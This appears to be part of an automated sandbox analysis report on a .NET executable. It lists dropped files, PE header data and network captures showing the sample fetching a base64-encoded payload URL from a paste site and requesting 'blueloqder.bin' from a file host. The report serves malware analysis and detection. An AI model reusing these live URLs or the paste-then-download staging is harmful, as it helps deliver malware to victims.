Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fubq5all.5qi.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hg32n3ot.c3e.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_prvsn3ld.r4p.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rgk4anlm.2t5.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_upfkpv1b.3pf.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vwvkiff3.2sv.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x5mnzawb.uqu.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ya2aaemy.nfa.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.372557280102937
Encrypted:	false
SSDEEP:	6144:VFVfpi6ceLP/9skLmb0ayWWSPtaJG8nAge35OlMMhA2AX4WABlguNqiL:TV1QyWWI/glMM6kF7oq
MD5:	3B800EA33C82C1006EB10FBC6FD9F5F2
SHA1:	758F214702FA9633D05B14A149907B66E1D30D6F
SHA-256:	3EA8D4DBA00050EC43AA31AB51973B986D05E2F7EB47D8B9BC41799978E0AA6F
SHA-512:	E2119011D7A723BDACC056BFAB641A6305690CB332B9A501F312D14369AA8F650681D222A5565B604E6FC41F554FE329B69F68DF33B648C6EED92B4F04E99236
Malicious:	false
Preview:	regfC...C....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.....).........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.175360398735887
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	9K25QyJ4hA.exe
File size:	15'872 bytes
MD5:	7e658759b69b246757803baf9f776a60
SHA1:	6e1304c6539500ba0100327ac64858c25639387c
SHA256:	b5858b684b93cec0c56768fda67e721595bdfa7d14dbf45b74abbf686c9b66a2
SHA512:	ef84ad21b1da818c9e10e70e4e82c4ae63cb07a0aeb15c354512af4c99a0ca0a079fcbd22815183e5847abe1cd7824aa09a21a72b8b2c3798840ed02d0e78b2e
SSDEEP:	384:ZgnOsus6BvAAQv/UOgRtr+lxJECoysFwIiiE:ZBsuLpIgQ9Mw5b
TLSH:	8A62075493E88732E97F0B7A4D7752810BB2BA2ADC62CF4D2D88B05E1CA3385471177B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....&............"...0..2..........JP... ...`....@.. ....................................`................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x40504a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x95FD26BA [Mon Sep 27 22:48:26 2049 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x4ff8	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x6000	0x6a0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x8000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x4f18	0x38	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x3050	0x3200	False	0.504296875	data	5.552858741926838	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x6000	0x6a0	0x800	False	0.33447265625	data	3.586738052421582	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x8000	0xc	0x200	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x6090	0x410	data			0.36538461538461536
RT_MANIFEST	0x64b0	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 8, 2023 14:28:57.684267998 CET	49705	443	192.168.2.8	104.21.70.240
Dec 8, 2023 14:28:57.684288979 CET	443	49705	104.21.70.240	192.168.2.8
Dec 8, 2023 14:28:57.684369087 CET	49705	443	192.168.2.8	104.21.70.240
Dec 8, 2023 14:28:57.702063084 CET	49705	443	192.168.2.8	104.21.70.240
Dec 8, 2023 14:28:57.702078104 CET	443	49705	104.21.70.240	192.168.2.8
Dec 8, 2023 14:28:57.974575996 CET	443	49705	104.21.70.240	192.168.2.8
Dec 8, 2023 14:28:57.974656105 CET	49705	443	192.168.2.8	104.21.70.240
Dec 8, 2023 14:28:57.978847980 CET	49705	443	192.168.2.8	104.21.70.240
Dec 8, 2023 14:28:57.978859901 CET	443	49705	104.21.70.240	192.168.2.8
Dec 8, 2023 14:28:57.979213953 CET	443	49705	104.21.70.240	192.168.2.8
Dec 8, 2023 14:28:58.033687115 CET	49705	443	192.168.2.8	104.21.70.240
Dec 8, 2023 14:28:58.058666945 CET	49705	443	192.168.2.8	104.21.70.240
Dec 8, 2023 14:28:58.104738951 CET	443	49705	104.21.70.240	192.168.2.8
Dec 8, 2023 14:29:00.322006941 CET	443	49705	104.21.70.240	192.168.2.8
Dec 8, 2023 14:29:00.322079897 CET	443	49705	104.21.70.240	192.168.2.8
Dec 8, 2023 14:29:00.322999954 CET	49705	443	192.168.2.8	104.21.70.240
Dec 8, 2023 14:29:00.330168962 CET	49705	443	192.168.2.8	104.21.70.240
Dec 8, 2023 14:29:00.473773003 CET	49706	443	192.168.2.8	5.253.86.15
Dec 8, 2023 14:29:00.473825932 CET	443	49706	5.253.86.15	192.168.2.8
Dec 8, 2023 14:29:00.473917961 CET	49706	443	192.168.2.8	5.253.86.15
Dec 8, 2023 14:29:00.474369049 CET	49706	443	192.168.2.8	5.253.86.15
Dec 8, 2023 14:29:00.474384069 CET	443	49706	5.253.86.15	192.168.2.8
Dec 8, 2023 14:29:01.227911949 CET	443	49706	5.253.86.15	192.168.2.8
Dec 8, 2023 14:29:01.228044033 CET	49706	443	192.168.2.8	5.253.86.15
Dec 8, 2023 14:29:01.231333971 CET	49706	443	192.168.2.8	5.253.86.15
Dec 8, 2023 14:29:01.231347084 CET	443	49706	5.253.86.15	192.168.2.8
Dec 8, 2023 14:29:01.231688023 CET	443	49706	5.253.86.15	192.168.2.8
Dec 8, 2023 14:29:01.233474016 CET	49706	443	192.168.2.8	5.253.86.15
Dec 8, 2023 14:29:01.276736975 CET	443	49706	5.253.86.15	192.168.2.8
Dec 8, 2023 14:29:02.614094019 CET	443	49706	5.253.86.15	192.168.2.8
Dec 8, 2023 14:29:02.614116907 CET	443	49706	5.253.86.15	192.168.2.8
Dec 8, 2023 14:29:02.614180088 CET	443	49706	5.253.86.15	192.168.2.8
Dec 8, 2023 14:29:02.614233971 CET	49706	443	192.168.2.8	5.253.86.15
Dec 8, 2023 14:29:02.614233971 CET	49706	443	192.168.2.8	5.253.86.15
Dec 8, 2023 14:29:02.616256952 CET	49706	443	192.168.2.8	5.253.86.15
Dec 8, 2023 14:29:07.220956087 CET	49709	443	192.168.2.8	104.21.70.240
Dec 8, 2023 14:29:07.221020937 CET	443	49709	104.21.70.240	192.168.2.8
Dec 8, 2023 14:29:07.221080065 CET	49709	443	192.168.2.8	104.21.70.240
Dec 8, 2023 14:29:07.257595062 CET	49709	443	192.168.2.8	104.21.70.240
Dec 8, 2023 14:29:07.257632017 CET	443	49709	104.21.70.240	192.168.2.8
Dec 8, 2023 14:29:07.516511917 CET	443	49709	104.21.70.240	192.168.2.8
Dec 8, 2023 14:29:07.516591072 CET	49709	443	192.168.2.8	104.21.70.240
Dec 8, 2023 14:29:07.518631935 CET	49709	443	192.168.2.8	104.21.70.240
Dec 8, 2023 14:29:07.518649101 CET	443	49709	104.21.70.240	192.168.2.8
Dec 8, 2023 14:29:07.519036055 CET	443	49709	104.21.70.240	192.168.2.8
Dec 8, 2023 14:29:07.564960957 CET	49709	443	192.168.2.8	104.21.70.240
Dec 8, 2023 14:29:07.604999065 CET	49709	443	192.168.2.8	104.21.70.240
Dec 8, 2023 14:29:07.648767948 CET	443	49709	104.21.70.240	192.168.2.8
Dec 8, 2023 14:29:08.129307032 CET	443	49709	104.21.70.240	192.168.2.8
Dec 8, 2023 14:29:08.129369974 CET	443	49709	104.21.70.240	192.168.2.8
Dec 8, 2023 14:29:08.129450083 CET	49709	443	192.168.2.8	104.21.70.240
Dec 8, 2023 14:29:08.145138025 CET	49709	443	192.168.2.8	104.21.70.240
Dec 8, 2023 14:29:08.150480032 CET	49710	443	192.168.2.8	5.253.86.15
Dec 8, 2023 14:29:08.150527000 CET	443	49710	5.253.86.15	192.168.2.8
Dec 8, 2023 14:29:08.150600910 CET	49710	443	192.168.2.8	5.253.86.15
Dec 8, 2023 14:29:08.151006937 CET	49710	443	192.168.2.8	5.253.86.15
Dec 8, 2023 14:29:08.151016951 CET	443	49710	5.253.86.15	192.168.2.8
Dec 8, 2023 14:29:08.887273073 CET	443	49710	5.253.86.15	192.168.2.8
Dec 8, 2023 14:29:08.887341022 CET	49710	443	192.168.2.8	5.253.86.15
Dec 8, 2023 14:29:08.889193058 CET	49710	443	192.168.2.8	5.253.86.15
Dec 8, 2023 14:29:08.889199018 CET	443	49710	5.253.86.15	192.168.2.8
Dec 8, 2023 14:29:08.889437914 CET	443	49710	5.253.86.15	192.168.2.8
Dec 8, 2023 14:29:08.891202927 CET	49710	443	192.168.2.8	5.253.86.15
Dec 8, 2023 14:29:08.932755947 CET	443	49710	5.253.86.15	192.168.2.8
Dec 8, 2023 14:29:10.051192999 CET	443	49710	5.253.86.15	192.168.2.8
Dec 8, 2023 14:29:10.051214933 CET	443	49710	5.253.86.15	192.168.2.8
Dec 8, 2023 14:29:10.051280022 CET	443	49710	5.253.86.15	192.168.2.8
Dec 8, 2023 14:29:10.051394939 CET	49710	443	192.168.2.8	5.253.86.15
Dec 8, 2023 14:29:10.051394939 CET	49710	443	192.168.2.8	5.253.86.15
Dec 8, 2023 14:29:10.052179098 CET	49710	443	192.168.2.8	5.253.86.15
Dec 8, 2023 14:29:15.177731037 CET	49712	443	192.168.2.8	104.21.70.240
Dec 8, 2023 14:29:15.177772999 CET	443	49712	104.21.70.240	192.168.2.8
Dec 8, 2023 14:29:15.177838087 CET	49712	443	192.168.2.8	104.21.70.240
Dec 8, 2023 14:29:15.187148094 CET	49712	443	192.168.2.8	104.21.70.240
Dec 8, 2023 14:29:15.187166929 CET	443	49712	104.21.70.240	192.168.2.8
Dec 8, 2023 14:29:15.457391024 CET	443	49712	104.21.70.240	192.168.2.8
Dec 8, 2023 14:29:15.457480907 CET	49712	443	192.168.2.8	104.21.70.240
Dec 8, 2023 14:29:15.460381985 CET	49712	443	192.168.2.8	104.21.70.240
Dec 8, 2023 14:29:15.460393906 CET	443	49712	104.21.70.240	192.168.2.8
Dec 8, 2023 14:29:15.460808992 CET	443	49712	104.21.70.240	192.168.2.8
Dec 8, 2023 14:29:15.502454996 CET	49712	443	192.168.2.8	104.21.70.240
Dec 8, 2023 14:29:15.572918892 CET	49712	443	192.168.2.8	104.21.70.240
Dec 8, 2023 14:29:15.616741896 CET	443	49712	104.21.70.240	192.168.2.8
Dec 8, 2023 14:29:16.065220118 CET	443	49712	104.21.70.240	192.168.2.8
Dec 8, 2023 14:29:16.065375090 CET	443	49712	104.21.70.240	192.168.2.8
Dec 8, 2023 14:29:16.065438032 CET	49712	443	192.168.2.8	104.21.70.240
Dec 8, 2023 14:29:16.082422972 CET	49712	443	192.168.2.8	104.21.70.240
Dec 8, 2023 14:29:16.088009119 CET	49714	443	192.168.2.8	5.253.86.15
Dec 8, 2023 14:29:16.088042974 CET	443	49714	5.253.86.15	192.168.2.8
Dec 8, 2023 14:29:16.088206053 CET	49714	443	192.168.2.8	5.253.86.15
Dec 8, 2023 14:29:16.088747025 CET	49714	443	192.168.2.8	5.253.86.15
Dec 8, 2023 14:29:16.088759899 CET	443	49714	5.253.86.15	192.168.2.8
Dec 8, 2023 14:29:16.836016893 CET	443	49714	5.253.86.15	192.168.2.8
Dec 8, 2023 14:29:16.836097002 CET	49714	443	192.168.2.8	5.253.86.15
Dec 8, 2023 14:29:16.837918043 CET	49714	443	192.168.2.8	5.253.86.15
Dec 8, 2023 14:29:16.837925911 CET	443	49714	5.253.86.15	192.168.2.8
Dec 8, 2023 14:29:16.838337898 CET	443	49714	5.253.86.15	192.168.2.8
Dec 8, 2023 14:29:16.840368986 CET	49714	443	192.168.2.8	5.253.86.15
Dec 8, 2023 14:29:16.880739927 CET	443	49714	5.253.86.15	192.168.2.8
Dec 8, 2023 14:29:42.197216988 CET	443	49714	5.253.86.15	192.168.2.8
Dec 8, 2023 14:29:42.197248936 CET	443	49714	5.253.86.15	192.168.2.8
Dec 8, 2023 14:29:42.197333097 CET	443	49714	5.253.86.15	192.168.2.8
Dec 8, 2023 14:29:42.197423935 CET	49714	443	192.168.2.8	5.253.86.15
Dec 8, 2023 14:29:42.197423935 CET	49714	443	192.168.2.8	5.253.86.15
Dec 8, 2023 14:29:42.198312044 CET	49714	443	192.168.2.8	5.253.86.15

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 8, 2023 14:28:57.538940907 CET	65360	53	192.168.2.8	1.1.1.1
Dec 8, 2023 14:28:57.673157930 CET	53	65360	1.1.1.1	192.168.2.8
Dec 8, 2023 14:29:00.338452101 CET	64677	53	192.168.2.8	1.1.1.1
Dec 8, 2023 14:29:00.469301939 CET	53	64677	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 8, 2023 14:28:57.538940907 CET	192.168.2.8	1.1.1.1	0x1fca	Standard query (0)	paste.fo	A (IP address)	IN (0x0001)	false
Dec 8, 2023 14:29:00.338452101 CET	192.168.2.8	1.1.1.1	0x493	Standard query (0)	oshi.at	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 8, 2023 14:28:57.673157930 CET	1.1.1.1	192.168.2.8	0x1fca	No error (0)	paste.fo	104.21.70.240	A (IP address)	IN (0x0001)	false
Dec 8, 2023 14:28:57.673157930 CET	1.1.1.1	192.168.2.8	0x1fca	No error (0)	paste.fo	172.67.140.164	A (IP address)	IN (0x0001)	false
Dec 8, 2023 14:29:00.469301939 CET	1.1.1.1	192.168.2.8	0x493	No error (0)	oshi.at	5.253.86.15	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

paste.fo

oshi.at

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49705	104.21.70.240	443	7384	C:\Users\user\Desktop\9K25QyJ4hA.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-08 13:28:58 UTC	74	OUT	GET /raw/015dbe46ef97 HTTP/1.1 Host: paste.fo Connection: Keep-Alive
2023-12-08 13:29:00 UTC	807	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 38 20 44 65 63 20 32 30 32 33 20 31 33 3a 32 39 3a 30 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 50 48 50 53 45 53 53 49 44 3d 74 38 33 72 37 68 74 67 34 33 39 70 32 38 39 35 6f 31 61 64 67 74 31 36 6c 63 3b 20 70 61 74 68 3d 2f 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 74 6f 6b 65 6e 3d 64 65 6c 65 74 65 64 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 30 31 2d 4a 61 6e 2d 31 39 37 30 20 30 30 3a 30 30 3a 30 31 20 47 4d 54 Data Ascii: HTTP/1.1 200 OKDate: Fri, 08 Dec 2023 13:29:00 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 48Connection: closeSet-Cookie: PHPSESSID=t83r7htg439p2895o1adgt16lc; path=/Set-Cookie: token=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT
2023-12-08 13:29:00 UTC	48	IN	Data Raw: 61 48 52 30 63 48 4d 36 4c 79 39 76 63 32 68 70 4c 6d 46 30 4c 33 52 78 53 6b 46 6a 4c 32 4a 73 64 57 56 73 62 33 46 6b 5a 58 49 75 59 6d 6c 75 Data Ascii: aHR0cHM6Ly9vc2hpLmF0L3RxSkFjL2JsdWVsb3FkZXIuYmlu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49706	5.253.86.15	443	7384	C:\Users\user\Desktop\9K25QyJ4hA.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-08 13:29:01 UTC	77	OUT	GET /tqJAc/blueloqder.bin HTTP/1.1 Host: oshi.at Connection: Keep-Alive
2023-12-08 13:29:02 UTC	158	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 38 20 44 65 63 20 32 30 32 33 20 31 33 3a 32 39 3a 30 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 38 34 39 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 08 Dec 2023 13:29:02 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
